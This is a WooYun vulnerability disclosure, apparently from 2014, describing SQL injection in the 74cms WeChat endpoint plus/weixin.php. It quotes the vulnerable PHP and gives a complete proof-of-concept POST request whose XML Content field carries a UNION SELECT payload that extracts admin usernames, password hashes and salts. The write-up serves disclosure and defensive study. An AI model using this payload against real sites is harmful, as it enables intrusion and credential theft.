当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2014-53968

漏洞标题: 74cms某功能注入漏洞(有条件)

相关厂商: 74cms.com

漏洞作者: phith0n认证白帽子

提交时间: 2014-03-18 19:20

公开时间: 2014-06-13 19:21

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码分析 白盒测试

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-18: 细节已通知厂商并且等待厂商处理中
2014-03-28: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-05-22: 细节向核心白帽子及相关领域专家公开
2014-06-01: 细节向普通白帽子公开
2014-06-11: 细节向实习白帽子公开
2014-06-13: 细节向公众公开

简要描述:

略鸡肋,分享出来。

详细说明:

最新版v3.4,更新时间20140310

文件/plus/weixin.php

responseMsg函数,使用

$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];

获得了post数据。所以,可以无视GPC。

获得的数据是XML格式,我们一会发送数据包即可。

继续看该函数:

code 区域
if (!empty($postStr))
{
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
$keyword = trim($postObj->Content);
$keyword = iconv("utf-8","gb2312",$keyword);
$time = time();
$event = trim($postObj->Event);



当我们获得的post数据非空时,用simplexml_load_string解析xml,复制到各个变量中。没有进行任何过滤。

继续看到:

code 区域
if($_CFG['sina_apiopen']=='0')
{
$word="网站微信接口已经关闭";
$text="<xml>
<ToUserName><![CDATA[".$fromUsername."]]></ToUserName>
<FromUserName><![CDATA[".$toUsername."]]></FromUserName>
<CreateTime>".$time."</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[".$word."]]></Content>
</xml> ";
exit($text);
}



这里有个判断,$_CFG[‘sina_apiopen’]必须不等于0 ,否则就会进入这个判断,最后exit整个文件,执行不到后面的注入的地方。所以这里是个鸡肋。

必须管理员在后台开启新浪微博登陆,才能注入。而这个功能是默认不开启的。

(不过很奇怪的是。。。这里明明是微信的相关功能。。。却验证的是新浪微博的开启状况。。。不忍吐槽)

所以,我测试的时候手动到后台开启了新浪微博功能:

01.jpg



这个时候,我们再继续看刚才的函数:

code 区域
$limit=" LIMIT 6";
$orderbysql=" ORDER BY refreshtime DESC";
if($keyword=="n")
{
$jobstable=table('jobs_search_rtime');
}
else if($keyword=="j")
{
$jobstable=table('jobs_search_rtime');
$wheresql=" where `emergency`=1 ";
}
else
{
$jobstable=table('jobs_search_key');
$wheresql.=" where likekey LIKE '%{$keyword}%' ";
}
$word='';
$list = $id = array();
$idresult = $this->query("SELECT id FROM {$jobstable} ".$wheresql.$orderbysql.$limit);



看到这里就清楚了,直接把keyword带入查询。而keyword就是我们通过xml传进来的Content。

漏洞证明:

管理员后台开启新浪微博登录以后,发送post数据包

code 区域
POST /74cms/plus/weixin.php?signature=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: hd_sid=WahL3a; hd_auth=1fa4iZzrIMEb5ZGSLQx5SE%2BJ6na3Zhf3d6dgq89u1nsfk58DTo4ry8IMrhasqGmVLISNxrP1qWgepMLzHFkU; PHPSESSID=7tvld6d36c052jsqcrrof9uk86
Connection: keep-alive
Content-Type: text/html
Content-Length: 252

<xml>
<FromUserName><![CDATA[owen]]></FromUserName>
<ToUsername><![CDATA[poal]]></ToUsername>
<Content><![CDATA[letmeplayagame'union select concat(admin_name,0x23,pwd,0x23,pwd_hash) from qs_admin#]]></Content>
<Event><![CDATA[aaa]]></Event>
</xml>





其中Content-Type不能是application/x-www-form-urlencoded,改成text/html,表示传过去的是文本内容。

其中Content内容是注入代码。

查看返回数据包:

02.jpg



注入成功。管理员用户名+密码+salt

修复方案:

过滤XML获得的数据。

版权声明:转载请注明来源 phith0n@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-13 19:21

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2014-03-23 17:33 | sn... ( 实习白帽子 | Rank:91 漏洞数:12 | 感觉下面有点硬。。。)
    1

    发了干嘛。我发的官方都不承认是漏洞,只会忽略然后自己悄悄修复。。这种垃圾厂商。。

  2. 2014-04-15 09:16 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    给力。

  3. 2014-06-13 21:36 | 无边落木 ( 路人 | Rank:2 漏洞数:1 | winter is coming!)
    0

    无良厂商

  4. 2014-06-14 17:38 | Ares ( 路人 | Rank:29 漏洞数:8 | 来自幼儿园大班)
    0

    无良厂商

登录后才能发表评论,请先 登录